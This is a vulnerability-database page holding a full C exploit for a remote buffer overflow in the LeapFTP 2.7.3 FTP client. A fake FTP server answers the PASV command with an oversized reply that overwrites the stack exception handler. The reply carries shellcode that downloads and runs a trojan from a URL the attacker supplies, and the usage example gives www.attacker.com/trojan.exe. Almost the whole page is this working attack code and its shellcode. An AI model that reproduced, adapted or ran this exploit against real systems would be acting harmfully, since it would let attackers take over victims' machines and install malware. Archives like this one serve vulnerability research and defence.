Vulners
Lucene search
LeapFTP 2.7.x Remote Buffer Overflow Exploit
============================================
LeapFTP 2.7.x Remote Buffer Overflow Exploit
============================================
/*
,----------------------------------------------------
; LeapFTP remote buffer overflow exploit
; by drG4njubas \\ DWC Group
`----------------------------------------------------
,----------------------------------------------------
;This exploit works against LeapFTP 2.7.3.600
;running on windows 2000 SP3 russian edition.
;Technical details: When LeapFTP requests IP
;and port by using PASV command if pasv mode
;is enabled, it causes the buffer overflow on
;the stack area if server's reply for this
;PASV request has a long IP address:
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1)
;And this buffer overflow can overwrite a
;Structured Exception Handler on the stack
;area with an arbitrary value by specifying
;the address data over 1057 bytes. If this
;reply contains 0x29 and 0x2E bytes, an
;exception occurs before Structured Exception
;Handler is overvritten and program continues
;it's normal work. Thanks a lot to RaiSe for
;his wonderful shellcode.
`----------------------------------------------------
*/
#include<winsock.h>
#include<stdio.h>
void main(int argc, char *argv[]){
printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
printf("; www.dwcgr0up.net ;\n");
printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");
if(argc < 3){
printf("USAGE : dwclft273.exe <port> <trojan url>\n");
printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
return;
}
char exploit[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
"\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
"\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
"\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
"\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
"\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
"\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
"\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
"\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
"\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
"\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
"\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
"\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
"\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
"\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
"\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
"\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
"\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
"\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
"\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
"\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
"\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
"\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
"\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
"\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
"\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
"\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
"\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
"\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
"\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
"\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
"\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
"\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";
char *url = argv[2];
if(strlen(url)>80){
printf("ERROR: trojan url is too long!\n");
return;
}
for(unsigned int i = 5; i < strlen(url); i++){
url[i]+=3;
exploit[839+i] = url[i];
}
exploit[839+i] = '\x0B';
exploit[839+i+1] = '\x04';
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
SOCKET listen_Sock = socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addr_Sock;
addr_Sock.sin_family = AF_INET;
addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
addr_Sock.sin_port = htons(atoi(argv[1]));
printf("Awaiting for connections...\n");
if(bind(listen_Sock,(LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr))) return;
if(listen(listen_Sock, 1))return;
SOCKET victim = accept(listen_Sock,NULL,NULL);
printf("Victim connected...\n");
char buffer[2048];
sprintf(buffer, "220 drG4njubas roxx da world...\r\n");
send(victim, buffer, strlen(buffer), NULL);
while(true){
if(recv(victim, buffer, 2048, NULL)==SOCKET_ERROR)return;
if(strncmp(buffer, "USER", 4)==0){
sprintf(buffer, "%s\r\n", "331 Password required for user.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASS", 4)==0){
sprintf(buffer, "%s\r\n", "230 User logged in.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "SYST", 4)==0){
sprintf(buffer, "%s\r\n", "215 Windows_NT version 5.0");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "REST", 4)==0){
sprintf(buffer, "%s\r\n", "350 Restarting at blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PWD", 3)==0){
sprintf(buffer, "%s\r\n", "257 Current directory was changed.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "TYPE", 4)==0){
sprintf(buffer, "%s\r\n", "200 Type set to blah.");
send(victim, buffer, strlen(buffer), NULL);
}
else if(strncmp(buffer, "PASV", 4)==0){
printf("PASV command received, sending exploit...");
sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", exploit);
send(victim, buffer, strlen(buffer), NULL);
printf("finnished.\n");
break;
}
else{
printf("ERROR: Wrong client or pasv mode is not enabled.\n");
break;
}
}
closesocket(victim);
closesocket(listen_Sock);
WSACleanup();
}
# 0day.today [2018-02-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2003 00:00Current
7.1High risk
Vulners AI Score7.1